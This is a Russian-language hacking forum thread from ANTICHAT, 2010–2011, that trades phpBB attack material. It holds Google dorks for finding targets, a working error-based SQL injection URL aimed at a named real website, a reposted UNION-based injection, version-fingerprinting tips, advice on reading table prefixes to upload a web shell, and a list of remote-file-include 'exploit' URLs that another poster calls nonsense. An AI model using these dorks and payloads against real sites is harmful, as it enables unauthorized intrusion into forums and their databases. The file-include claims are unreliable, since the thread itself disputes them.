ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.03.2010, 22:29
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Target: phpbb2*
Dork: inurl:"kb.php?mode=cat"
Example:
Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13
SQL injection (without union+select):
Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)
Префикс таблицы kb_categories может отличаться, но его видно в ошибке

PS: актуально для 4.1<=MySQL=>5
 
Ответить с цитированием

  #2  
Старый 22.06.2010, 01:11
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

Версия - 2.x

Может я не увидел, и эта информация где-то должна отображатся, но всё же отпишу. Если у вас есть админка, и вам нужно узнать префикс для заливки шелла, делаем несколько банальных действий.

Общие настройки - Резервная копия БД - Копировать только структуру(пташка) - начать копирование, файл скачивается и собственно в нём уже и смотрим префикс.

Такая вот маленькая полезность. Может ещё кому пригодится.
 
Ответить с цитированием

  #3  
Старый 16.10.2010, 17:25
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
С нами: 9017758

Репутация: 13
По умолчанию

===========================================

PHPBB 3.0.* CMS SQL Injection Vulnerability

===========================================

# Exploit Title: PHPBB 3.0.* CMS SQLinjection

# Date: 2010-08-27

# Team: eX.ploit ( Abjects #ex.ploit )

# Software Link: http://www.phpbb.com/

# Version: PHPBB3.0.* CMS only (does not work on FORUM only)

# Tested on: Linux

# Usage: SQLinjection

# Gain detailed database information

Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]

# Tested on:linux/php

Url| http://www.website.com/news_view.php?id=1

Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4

# Inj3ct0r.com [2010-08-27]​
 
Ответить с цитированием

  #4  
Старый 03.11.2010, 04:05
marD
Новичок
Регистрация: 16.08.2005
Сообщений: 11
С нами: 10913377

Репутация: 0
По умолчанию

так же версию продукта можно определить

forum/styles/prosilver/style.cfg
 
Ответить с цитированием

  #5  
Старый 24.12.2010, 18:57
juffin
Новичок
Регистрация: 13.12.2010
Сообщений: 2
С нами: 8112566

Репутация: 0
По умолчанию

Цитата:
Сообщение от marD  
так же версию продукта можно определить
forum/styles/prosilver/style.cfg
интересно.

Да действительно работает даже на версии 3.0.8

м.б. есть еще что то что можно проверить?

выдает:

Код HTML:
#
# phpBB Style Configuration File
#
# @package phpBB3
# @copyright (c) 2005 phpBB Group
# @license http://opensource.org/licenses/gpl-license.php GNU Public License
#
#
# At the left is the name, please do not change this
# At the right the value is entered
# For on/off options the valid values are on, off, 1, 0, true and false
#
# Values get trimmed, if you want to add a space in front or at the end of
# the value, then enclose the value with single or double quotes.
# Single and double quotes do not need to be escaped.
#
#

# General Information about this style
name = prosilver
copyright = &copy; phpBB Group, 2007
version = 3.0.8
не удасться ли это использовать как уязвимость?

более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden

You don't have permission to access /styles/ on this server. "

не появиось ли чего новенького для 3.0.8 ?
 
Ответить с цитированием

  #6  
Старый 02.01.2011, 21:01
Catch_t
Новичок
Регистрация: 18.12.2010
Сообщений: 4
С нами: 8105366

Репутация: 0
По умолчанию

Цитата:
Сообщение от juffin  
м.б. есть еще что то что можно проверить?
Можно проверять по второму, идущему в стандарте, стилю: forum/styles/subsilver2/style.cfg

Однако оба этих файла не могут дать твёрдой уверенности, т.к. не всегда обновляются админами при смене версии движка.

Определить версию 3.0.8 можно по косвенным признакам:

1) Наличие файла forum/web.config (*nix отдаст как текст)

2) Ошибка 403 при запросе файлов из папки forum/includes/ (например, forum/includes/functions.php), в более старых версиях открывается чистая страница (ибо exit).

Цитата:
Сообщение от juffin  
не удасться ли это использовать как уязвимость?
Это не уязвимость.

Цитата:
Сообщение от juffin  
более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden
You don't have permission to access /styles/ on this server. "
не появиось ли чего новенького для 3.0.8 ?
Это самодеятельность админов, в стандартной поставке файлы из папки forum/styles/ не защищены ничем
 
Ответить с цитированием

  #7  
Старый 16.01.2011, 02:55
juffin
Новичок
Регистрация: 13.12.2010
Сообщений: 2
С нами: 8112566

Репутация: 0
По умолчанию

интересно. версия точно 3.0.8 все описанные выше косвенные признаки присутствуют,includes/ закрыты видимо .htaccess -ом и т.п.

довольно интересно, нет ли каких либо советов? какие то недо конца или плохо закрытые ветки ? м.б. инъекции уже появились?
 
Ответить с цитированием

  #8  
Старый 18.01.2011, 10:03
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами: 10158236

Репутация: 0
По умолчанию

phpBB 3.0.7

Код:
######################################################################
#
# PHPBB Version 3.0.7 Remote File Include !
#
# Author : D.0.M TEAM
#
# Founded By : S3Ri0uS !
#
# We Are : Inj3ct0r.com Exploit and Vulnerability Database.
#
# Public Site : WwW.Anti-Secure.CoM !
#
# Security Site : WwW.D0M-Security.CoM !
#
# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !
#
# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !
#
# SpT : All Iranian Hackers !
#
######################################################################
#
# Dork :
#
# inurl:&quot;powered by PHPBB Version 3.0.7&quot;
#
# Exploit :
#
# http://www.site.com/path/common.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/cron.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/faq.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/feed.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/mcp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/memberlist.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/posting.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/report.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/search.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/style.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/ucp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/viewforum.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/swatch.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/download/file.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/auth.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/functions.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/functions_content.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/session.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/template.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/acm/acm_file.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/acp/acp_attachments.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/utf/utf_tools.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/ucp_register.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/ucp_pm_viewmessage.php?phpbb_root_path=[shell code]
#
######################################################################
 
Ответить с цитированием

  #9  
Старый 29.01.2011, 19:59
Catch_t
Новичок
Регистрация: 18.12.2010
Сообщений: 4
С нами: 8105366

Репутация: 0
По умолчанию

SSSetuPPP, это же бред.

Файл common.php закрыт через .htaccess, во всех файлах из папки /includes/ при прямом запросе срабатывает exit, да и переопределние переменной phpbb_root_path ничего не сможет дать. Хотя указанный выше "эксплоит" ничего и не способен переопределить.
 
Ответить с цитированием

  #10  
Старый 31.01.2011, 09:09
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами: 10158236

Репутация: 0
По умолчанию

phpBB Version 3.0.7 Remote File Include Vulnerability

_http://www.inj3ct0r.com/exploits/12604

_http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21
Google Code Search облегчит хакерам задачу по поиску уязвимостей Lany Мировые новости. Обсуждения. 4 16.10.2006 21:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.